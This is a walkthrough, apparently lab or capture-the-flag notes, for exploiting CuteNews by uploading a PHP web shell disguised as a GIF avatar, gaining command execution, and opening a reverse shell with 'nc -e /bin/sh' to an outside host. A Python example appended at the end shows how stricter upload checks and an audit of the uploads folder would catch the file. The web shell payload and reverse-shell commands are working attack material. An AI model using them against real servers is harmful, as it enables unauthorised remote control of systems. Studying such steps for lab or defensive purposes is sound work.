CuteNews
[1] Navigate to the default page and register a new user
http://10.10.10.10/index.php
[2] Register with a bogus e-mail, user and password
[3] If the captcha required for registration is malformed or does not show up, find it at the default .../captcha.php page
[4] Once logged in, click on personal options and find the "avatar" tab
[5] Craft a malicious PHP script "evil.php"; a leading magic byte tricks the system into treating the ASCII file as a .gif
GIF8;
<?php system($_REQUEST['cmd']) ?>
[6] Upload the malicious file, then check the folder where it was uploaded
Default location:
http://10.10.10.10/uploads/avatar_redcliff_evil.php
[7] Get command execution
http://10.10.10.10/uploads/avatar_redcliff_evil.php?cmd=whoami
[8] Reverse shell
http://10.10.10.10/uploads/avatar_redcliff_evilx.php?cmd=nc -e /bin/sh 10.10.10.10 1234 (may need URL encoding)
Catch the reverse shell: nc -nvlp 1234
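
Defender's view of step [5], as an added example that is not part of the original notes and not CuteNews code: a prefix-only magic-byte check accepts the file above, while an extension allow-list plus full-signature and content check rejects it, and the same check can audit an existing uploads folder. The function names, the allowed types and `weak_check` as a model of the application's behaviour are assumptions.

```python
import os
import re

# Assumption: avatars are limited to these types; the list is not taken from CuteNews.
ALLOWED = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
# PHP open tags; may rarely match random bytes in a real image, so treat hits as leads.
SCRIPT_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

# Constructed samples: the file from step [5] and a minimal GIF header.
SAMPLE_EVIL = b"GIF8;\n<?php system($_REQUEST['cmd']) ?>"
SAMPLE_GIF = b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"


def weak_check(filename, data):
    """Prefix-only check (hypothetical): accepts anything starting with GIF8."""
    return data.startswith(b"GIF8")


def strict_check(filename, data):
    """Return reasons to reject an upload; an empty list means accept."""
    reasons = []
    ext = os.path.splitext(filename)[1].lower()
    magics = ALLOWED.get(ext)
    if magics is None:
        reasons.append("extension not allow-listed")
    elif not data.startswith(magics):
        reasons.append("signature does not match extension")
    if SCRIPT_TAG.search(data):
        reasons.append("embedded PHP open tag")
    return reasons


def audit_uploads(directory):
    """Map each file under directory that fails strict_check to its reasons."""
    findings = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                reasons = strict_check(name, fh.read())
            if reasons:
                findings[path] = reasons
    return findings
```

Content checks like this are a triage aid; serving the uploads directory with script execution disabled is what stops an uploaded file from running.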